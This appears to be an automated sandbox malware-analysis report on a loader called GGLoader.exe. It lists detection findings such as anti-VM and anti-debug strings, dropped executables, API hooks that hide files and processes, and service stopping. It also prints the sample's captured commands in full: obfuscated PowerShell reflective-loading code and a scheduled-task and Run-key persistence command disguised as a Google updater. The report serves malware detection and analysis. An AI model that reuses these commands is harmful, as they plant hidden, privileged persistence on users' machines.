Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000034.00000000.2285237009.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2957094411.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000034.00000002.2957703615.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000000.2285310844.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000034.00000002.2957703615.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000000.2285310844.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp

Data Obfuscation
barindex
Binary or sample is protected by dotNetProtector
Source: GGLoader.exe, 00000000.00000000.1702342271.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: dotNetProtector
Source: GGLoader.exe, 00000000.00000000.1702342271.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: Form200Form210Form220Form230Form240Form250Form260Form270Form280Form290Form201Form211Form221Form231Form241Form251Form261Form271Form281Form291D1Form202Form212Form222Form232Form242Form252Form262Form272Form282Form292Form203Form213Form223Form233Form243Form253Form263Form273Form283Form293Form204Form214Form224Form234Form244Form254Form264Form274Form284Form294Form205Form215Form225Form235Form245Form255Form265Form275Form285Form295Form206Form216Form226Form236Form246Form256Form266Form276Form286Form296Form207Form217Form227Form237Form247Form257Form267Form277Form287Form297Form208Form218Form228Form238Form248Form258Form268Form278Form288Form298get_UTF8Form209Form219Form229Form239Form249Form259Form269Form279Form289Form299<Module>mscorlibThreadget_IsAttachedIsEmulatedNetGuardIDisposableget_HandleGetModuleHandleCloseHandleset_WindowStyleProcessWindowStyleset_FileNameDisposeBabelAttributeSuppressIldasmAttributeYanoAttributeDotfuscatorAttributeCompilationRelaxationsAttributeConfusedByAttributeRuntimeCompatibilityAttributeD1.exeSystem.ThreadingEncodingFromBase64StringToStringGetStringObfuscatedByGoliathAntiVMCheckAntiDebugCheckkernel32.dllget_ItemSystemMainManagementObjectCollectionExceptionProcessStartInfoZeroSleepDebuggerManagementObjectSearcherToLowerManagementObjectEnumeratorGetEnumerator.ctor.cctordotNetProtectorIntPtrSystem.DiagnosticsSystem.Runtime.CompilerServicesContainsGetCurrentProcessset_ArgumentsManagementBaseObjectGetop_ExplicitExitToUpperInvariantSystem.ManagementEnvironmentget_CurrentIsModulePresentCheckRemoteDebuggerPresentIsDebuggerPresentget_TickCountStartConvertMoveNextSystem.Textset_CreateNoWindowCheckForVMwareAndVirtualBoxdmjzxop_Equalityop_InequalityESelect * from Win32_ComputerSystem
Source: GGLoader.exe String found in binary or memory: dotNetProtector
Source: GGLoader.exe String found in binary or memory: Form200Form210Form220Form230Form240Form250Form260Form270Form280Form290Form201Form211Form221Form231Form241Form251Form261Form271Form281Form291D1Form202Form212Form222Form232Form242Form252Form262Form272Form282Form292Form203Form213Form223Form233Form243Form253Form263Form273Form283Form293Form204Form214Form224Form234Form244Form254Form264Form274Form284Form294Form205Form215Form225Form235Form245Form255Form265Form275Form285Form295Form206Form216Form226Form236Form246Form256Form266Form276Form286Form296Form207Form217Form227Form237Form247Form257Form267Form277Form287Form297Form208Form218Form228Form238Form248Form258Form268Form278Form288Form298get_UTF8Form209Form219Form229Form239Form249Form259Form269Form279Form289Form299<Module>mscorlibThreadget_IsAttachedIsEmulatedNetGuardIDisposableget_HandleGetModuleHandleCloseHandleset_WindowStyleProcessWindowStyleset_FileNameDisposeBabelAttributeSuppressIldasmAttributeYanoAttributeDotfuscatorAttributeCompilationRelaxationsAttributeConfusedByAttributeRuntimeCompatibilityAttributeD1.exeSystem.ThreadingEncodingFromBase64StringToStringGetStringObfuscatedByGoliathAntiVMCheckAntiDebugCheckkernel32.dllget_ItemSystemMainManagementObjectCollectionExceptionProcessStartInfoZeroSleepDebuggerManagementObjectSearcherToLowerManagementObjectEnumeratorGetEnumerator.ctor.cctordotNetProtectorIntPtrSystem.DiagnosticsSystem.Runtime.CompilerServicesContainsGetCurrentProcessset_ArgumentsManagementBaseObjectGetop_ExplicitExitToUpperInvariantSystem.ManagementEnvironmentget_CurrentIsModulePresentCheckRemoteDebuggerPresentIsDebuggerPresentget_TickCountStartConvertMoveNextSystem.Textset_CreateNoWindowCheckForVMwareAndVirtualBoxdmjzxop_Equalityop_InequalityESelect * from Win32_ComputerSystem
Obfuscated command line found
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:NGLbonfBsuNR{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$QtvYIpWnFCFICq,[Parameter(Position=1)][Type]$hhlNOVEDYw)$dpttUeHYiSd=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+''+'d'+''+[Char](68)+'e'+[Char](108)+''+'e'+''+[Char](103)+'a'+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+'em'+[Char](111)+''+[Char](114)+''+[Char](121)+'M'+'o'+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType(''+[Char](77)+'yD'+'e'+'l'+[Char](101)+''+'g'+'at'+'e'+''+'T'+''+[Char](121)+''+'p'+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+'b'+''+[Char](108)+'ic'+[Char](44)+''+[Char](83)+''+[Char](101)+'ale'+[Char](100)+''+[Char](44)+''+[Char](65)+''+'n'+''+[Char](115)+'i'+'C'+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+'A'+''+[Char](117)+''+[Char](116)+'o'+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$dpttUeHYiSd.DefineConstructor(''+[Char](82)+''+'T'+''+'S'+''+[Char](112)+''+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+'m'+'e,'+[Char](72)+'ide'+'B'+'y'+'S'+''+'i'+''+[Char](103)+''+','+'P'+[Char](117)+''+'b'+'l'+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$QtvYIpWnFCFICq).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nt'+[Char](105)+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+'n'+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$dpttUeHYiSd.DefineMethod('I'+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+'e'+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+'i'+''+'c'+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+'y'+'S'+''+[Char](105)+'g'+[Char](44)+'N'+'e'+'w'+[Char](83)+''+[Char](108)+''+[Char](111)+''+'t'+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+'u'+''+[Char](97)+''+'l'+'',$hhlNOVEDYw,$QtvYIpWnFCFICq).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+'a'+''+'n'+''+'a'+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $dpttUeHYiSd.CreateType();}$fxvCjurJEEUcT=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+'t'+''+[Char](101)+'m'+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType('M'+'i'+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+'s'+'o'+'f'+'t'+'.'+''+'W'+''+[Char](105)+''+'n'+''+[Char](51)+''+'2'+''+[Char](46)+''+'U'+'n'+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+'f'+'x'+''+[Char](118)+'C'+[Char](106)+''+'u'+''+[Char](
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:QgCYtqphZUyk{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$MPiGGXNLyYxMMn,[Parameter(Position=1)][Type]$YKFTYMbQTB)$nMulMONdbgM=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+'l'+'e'+'c'+''+'t'+'e'+[Char](100)+'D'+[Char](101)+''+[Char](108)+'e'+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+''+[Char](101)+''+'m'+'or'+[Char](121)+''+[Char](77)+''+[Char](111)+''+'d'+'u'+[Char](108)+''+'e'+'',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+''+[Char](101)+'le'+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+''+[Char](84)+''+'y'+'p'+[Char](101)+'',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+'li'+'c'+''+','+'S'+[Char](101)+''+'a'+''+[Char](108)+'ed,A'+[Char](110)+'s'+[Char](105)+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+'s'+[Char](44)+''+[Char](65)+''+'u'+''+[Char](116)+''+[Char](111)+''+[Char](67)+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$nMulMONdbgM.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+'p'+''+[Char](101)+''+'c'+''+[Char](105)+''+'a'+''+'l'+''+[Char](78)+''+[Char](97)+'me'+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+'Si'+[Char](103)+''+','+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$MPiGGXNLyYxMMn).SetImplementationFlags(''+'R'+'u'+[Char](110)+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+'n'+[Char](97)+''+'g'+''+'e'+''+[Char](100)+'');$nMulMONdbgM.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+'k'+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+'b'+[Char](108)+'i'+[Char](99)+','+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+'ig'+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+'S'+[Char](108)+'ot'+[Char](44)+'V'+[Char](105)+'r'+'t'+'u'+[Char](97)+''+[Char](108)+'',$YKFTYMbQTB,$MPiGGXNLyYxMMn).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+'M'+'a'+''+[Char](110)+''+'a'+''+'g'+''+[Char](101)+'d');Write-Output $nMulMONdbgM.CreateType();}$mrsNZvUsWJBnM=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+'.d'+[Char](108)+'l')}).GetType('Mi'+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+''+[Char](116)+''+'.'+''+'W'+''+'i'+''+'n'+'3'+[Char](50)+'.'+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+'emr'+[Char](115)+''+[Char](78)+''+[Char](90)+''+'v'+''+[
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ncotqmia#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:NGLbonfBsuNR{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$QtvYIpWnFCFICq,[Parameter(Position=1)][Type]$hhlNOVEDYw)$dpttUeHYiSd=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+''+'d'+''+[Char](68)+'e'+[Char](108)+''+'e'+''+[Char](103)+'a'+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+'em'+[Char](111)+''+[Char](114)+''+[Char](121)+'M'+'o'+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType(''+[Char](77)+'yD'+'e'+'l'+[Char](101)+''+'g'+'at'+'e'+''+'T'+''+[Char](121)+''+'p'+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+'b'+''+[Char](108)+'ic'+[Char](44)+''+[Char](83)+''+[Char](101)+'ale'+[Char](100)+''+[Char](44)+''+[Char](65)+''+'n'+''+[Char](115)+'i'+'C'+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+'A'+''+[Char](117)+''+[Char](116)+'o'+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$dpttUeHYiSd.DefineConstructor(''+[Char](82)+''+'T'+''+'S'+''+[Char](112)+''+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+'m'+'e,'+[Char](72)+'ide'+'B'+'y'+'S'+''+'i'+''+[Char](103)+''+','+'P'+[Char](117)+''+'b'+'l'+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$QtvYIpWnFCFICq).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nt'+[Char](105)+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+'n'+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$dpttUeHYiSd.DefineMethod('I'+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+'e'+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+'i'+''+'c'+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+'y'+'S'+''+[Char](105)+'g'+[Char](44)+'N'+'e'+'w'+[Char](83)+''+[Char](108)+''+[Char](111)+''+'t'+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+'u'+''+[Char](97)+''+'l'+'',$hhlNOVEDYw,$QtvYIpWnFCFICq).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+'a'+''+'n'+''+'a'+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $dpttUeHYiSd.CreateType();}$fxvCjurJEEUcT=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+'t'+''+[Char](101)+'m'+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType('M'+'i'+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+'s'+'o'+'f'+'t'+'.'+''+'W'+''+[Char](105)+''+'n'+''+[Char](51)+''+'2'+''+[Char](46)+''+'U'+'n'+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+'f'+'x'+''+[Char](118)+'C'+[Char](106)+''+'u'+''+[Char](
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:QgCYtqphZUyk{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$MPiGGXNLyYxMMn,[Parameter(Position=1)][Type]$YKFTYMbQTB)$nMulMONdbgM=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+'l'+'e'+'c'+''+'t'+'e'+[Char](100)+'D'+[Char](101)+''+[Char](108)+'e'+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+''+[Char](101)+''+'m'+'or'+[Char](121)+''+[Char](77)+''+[Char](111)+''+'d'+'u'+[Char](108)+''+'e'+'',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+''+[Char](101)+'le'+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+''+[Char](84)+''+'y'+'p'+[Char](101)+'',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+'li'+'c'+''+','+'S'+[Char](101)+''+'a'+''+[Char](108)+'ed,A'+[Char](110)+'s'+[Char](105)+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+'s'+[Char](44)+''+[Char](65)+''+'u'+''+[Char](116)+''+[Char](111)+''+[Char](67)+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$nMulMONdbgM.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+'p'+''+[Char](101)+''+'c'+''+[Char](105)+''+'a'+''+'l'+''+[Char](78)+''+[Char](97)+'me'+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+'Si'+[Char](103)+''+','+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$MPiGGXNLyYxMMn).SetImplementationFlags(''+'R'+'u'+[Char](110)+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+'n'+[Char](97)+''+'g'+''+'e'+''+[Char](100)+'');$nMulMONdbgM.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+'k'+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+'b'+[Char](108)+'i'+[Char](99)+','+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+'ig'+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+'S'+[Char](108)+'ot'+[Char](44)+'V'+[Char](105)+'r'+'t'+'u'+[Char](97)+''+[Char](108)+'',$YKFTYMbQTB,$MPiGGXNLyYxMMn).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+'M'+'a'+''+[Char](110)+''+'a'+''+'g'+''+[Char](101)+'d');Write-Output $nMulMONdbgM.CreateType();}$mrsNZvUsWJBnM=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+'.d'+[Char](108)+'l')}).GetType('Mi'+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+''+[Char](116)+''+'.'+''+'W'+''+'i'+''+'n'+'3'+[Char](50)+'.'+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+'emr'+[Char](115)+''+[Char](78)+''+[Char](90)+''+'v'+''+[
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ncotqmia#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' } Jump to behavior
PE file contains an invalid checksum
Source: updater.exe.7.dr Static PE information: real checksum: 0x241e4c should be: 0x2471a6
Source: LicenseGet.exe.1.dr Static PE information: real checksum: 0x0 should be: 0x36ca3
Source: LicCheck.exe.1.dr Static PE information: real checksum: 0x0 should be: 0x49cdb
Source: GGLoader.exe Static PE information: real checksum: 0x0 should be: 0x13d5e
Source: LicSend.exe.1.dr Static PE information: real checksum: 0x241e4c should be: 0x2471a6
Source: poduiwcd.tmp.7.dr Static PE information: real checksum: 0x0 should be: 0x2ec3f
PE file contains sections with non-standard names
Source: LicSend.exe.1.dr Static PE information: section name: .xdata
Source: updater.exe.7.dr Static PE information: section name: .xdata
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B78D2A5 pushad ; iretd 1_2_00007FFD9B78D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B8A0942 push E95B44D0h; ret 1_2_00007FFD9B8A09C9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD9B8811C8 push E95B46C7h; ret 3_2_00007FFD9B881209
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: 6_2_007A5798 push ecx; ret 6_2_007A57AB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_00007FFD9B76D2A5 pushad ; iretd 17_2_00007FFD9B76D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_00007FFD9B880E10 push eax; retf 17_2_00007FFD9B880E1D
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: 35_2_00C0D102 push cs; retf 35_2_00C0D103
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: 35_2_00BF5798 push ecx; ret 35_2_00BF57AB
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 38_2_02F068E1 push eax; iretd 38_2_02F06949
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 38_2_02F067D9 push eax; retf 38_2_02F06809
Source: C:\Windows\System32\conhost.exe Code function: 39_2_000002505E5722B8 push rdx; retf 39_2_000002505E5722B9
Source: C:\Windows\System32\conhost.exe Code function: 39_2_000002505E5784FD push rcx; retf 003Fh 39_2_000002505E5784FE
Source: C:\Windows\System32\conhost.exe Code function: 39_2_000002505E5A94FD push rcx; retf 003Fh 39_2_000002505E5A94FE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 40_2_00007FFD9BAA3C0C push ds; retf 40_2_00007FFD9BAA3C3A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 40_2_00007FFD9BAA3BEC push ds; retf 40_2_00007FFD9BAA3C2A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 40_2_00007FFD9BAA7DDC push ss; iretd 40_2_00007FFD9BAA7DEA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 40_2_00007FFD9BAA98CC pushad ; iretd 40_2_00007FFD9BAA98DA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 40_2_00007FFD9BCC73A2 push E85F7F18h; ret 40_2_00007FFD9BCC73A9
Source: C:\Windows\System32\conhost.exe Code function: 41_2_000001C08C1922B8 push rdx; retf 41_2_000001C08C1922B9
Source: C:\Windows\System32\conhost.exe Code function: 41_2_000001C08C1984FD push rcx; retf 003Fh 41_2_000001C08C1984FE
Source: C:\Windows\System32\conhost.exe Code function: 41_2_000001C08C1C94FD push rcx; retf 003Fh 41_2_000001C08C1C94FE
Source: C:\Windows\System32\dllhost.exe Code function: 42_2_00000213111994FD push rcx; retf 003Fh 42_2_00000213111994FE
Source: C:\Windows\System32\winlogon.exe Code function: 43_2_00000225DC6222B8 push rdx; retf 43_2_00000225DC6222B9
Source: C:\Windows\System32\winlogon.exe Code function: 43_2_00000225DC6284FD push rcx; retf 003Fh 43_2_00000225DC6284FE
Source: C:\Windows\System32\winlogon.exe Code function: 43_2_00000225DC6594FD push rcx; retf 003Fh 43_2_00000225DC6594FE

Persistence and Installation Behavior
barindex
Uses cmd line tools excessively to alter registry or file data
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\LicenseGet.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe File created: C:\Program Files\Google\Chrome\updater.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe File created: C:\Users\user\AppData\Local\Temp\poduiwcd.tmp Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\LicCheck.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe File created: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\LicSend.exe Jump to dropped file

Boot Survival
barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "svcupdater" /tr "C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop UsoSvc

Hooking and other Techniques for Hiding and Protection
barindex
Found hidden mapped module (file has been removed from disk)
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\PODUIWCD.TMP
Hooks files or directories query functions (used to hide files and directories)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
Hooks processes query functions (used to hide processes)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
Hooks registry keys query functions (used to hide registry keys)
